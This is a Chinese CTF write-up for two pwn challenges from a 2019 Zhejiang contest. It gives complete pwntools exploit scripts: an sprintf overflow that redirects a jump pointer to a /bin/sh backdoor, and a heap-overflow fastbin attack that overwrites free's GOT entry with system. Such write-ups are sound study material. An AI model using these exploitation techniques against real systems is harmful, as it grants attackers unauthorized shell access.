CTF-19年浙江省大学生网络安全大赛

Pwn

0x1 login

这道题是用C++写的，有很多很长名字的函数，不过问题不大，经过ida分析，只需要输入以下数据，即可发生某地址跳转

 _____   _  ____ _____ _____   _                _       
|__  /  | |/ ___|_   _|  ___| | |    ___   __ _(_)_ __  
  / /_  | | |     | | | |_    | |   / _ \ / _` | | '_ \ 
 / /| |_| | |___  | | |  _|   | |__| (_) | (_| | | | | |
/____\___/ \____| |_| |_|     |_____\___/ \__, |_|_| |_|
                                          |___/         
Please enter username: admin
Please enter password: 2jctf_pa5sw0rd
Password accepted: Password accepted: 

Segmentation fault (core dumped)

接着发现sprintf的长度没有足够大，可以覆盖到这个跳转指针，且程序本身就有system("/bin/sh")的backdoor，所以可以直接覆盖这个跳转指针为backdoor指针，即可拿到shell

Exp如下：

#!/usr/bin/python2.7  
# -*- coding: utf-8 -*-
from pwn import *
context.log_level = "debug"
context.arch = "amd64"
elf = ELF("login")
sh = 0
lib = 0
def pwn(ip,port,debug):
	global sh
	global lib
	if(debug == 1):
		sh = process("./login")
		lib = ELF("/lib/x86_64-linux-gnu/libc.so.6")
	else:
		sh = remote(ip,port)
		lib = ELF("/lib/x86_64-linux-gnu/libc.so.6")
	payload = "admin\x00"
	sh.sendlineafter(":",payload)
	sh.recvuntil(":")
	payload = "2jctf_pa5sw0rd\x00"
	payload += "aaaabaaac\x00aadaaaeaaafaaagaaahayyyyyyyyyyyyyyyyyyyyyyyyyyy" + p64(0x400E9E)
	sh.sendline(payload)
	sh.interactive()
if __name__ == "__main__":
	pwn("127.0.0.1",9999,1)

0x2 easyheap

堆题先检查保护

pig@ubuntu:$ checksec easyheap 
[*] '/home/pig/Pig/CTF/ShengSai/19.9.21/pwn/easyheap/easyheap'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
`

没有开PIE 且 没有GOT保护，先想到覆盖free_GOT

然后导入ida发现有明显的堆溢出，然后程序本身就存在system函数，所以直接覆盖free_GOT为system_PLT，然后free一个内容为/bin/sh的堆块即可执行system("/bin/sh\x00")

具体步骤如下

申请三个堆块，通过第二个堆块覆盖到第三个堆块实现fastbin attack攻击chunk_list，然后覆盖第一个堆块为free_GOT，然后通过edit功能修改free_GOT为system_PLT，同时第二个堆块的内容为/bin/sh\x00，free掉第二个堆块即可拿到shell

Exp如下：

#!/usr/bin/python2.7  
# -*- coding: utf-8 -*-
from pwn import *
context.log_level = "debug"
context.arch = "amd64"
elf = ELF("easyheap")
sh = 0
lib = 0
def edit(idx,size,content):
	sh.sendlineafter("Your choice :","2")
	sh.sendlineafter(":",str(idx))
	sh.sendlineafter(":",str(size))
	sh.sendafter(":",content)
def add(size,content):
	sh.sendlineafter("Your choice :","1")
	sh.sendlineafter(":",str(size))
	sh.sendlineafter(":",content)
def free(idx):
	sh.sendlineafter("Your choice :","3")
	sh.sendlineafter(":",str(idx))
def pwn(ip,port,debug):
	global sh
	global lib
	if(debug == 1):
		sh = process("./easyheap")
		lib = ELF("/lib/x86_64-linux-gnu/libc.so.6")
	else:
		sh = remote(ip,port)
		lib = ELF("/lib/x86_64-linux-gnu/libc.so.6")
	add(0x68,'')
	add(0x68,'')
	add(0x68,'')
	free(2)
	payload = '/bin/sh\x00'
	payload = payload.ljust(0x68,'a')
	payload += p64(0x71) + p64(0x6020ad)
	edit(1,0x200,payload)
	add(0x68,'')
	add(0x68,'')
	payload = '\xaa' * 3 + p64(0) * 4 + p64(elf.got['free'])
	edit(3,len(payload) + 0x100,payload)
	edit(0,9,p64(elf.plt['system']))
	free(1)
	sh.interactive()
if __name__ == "__main__":
	pwn("127.0.0.1",9999,1)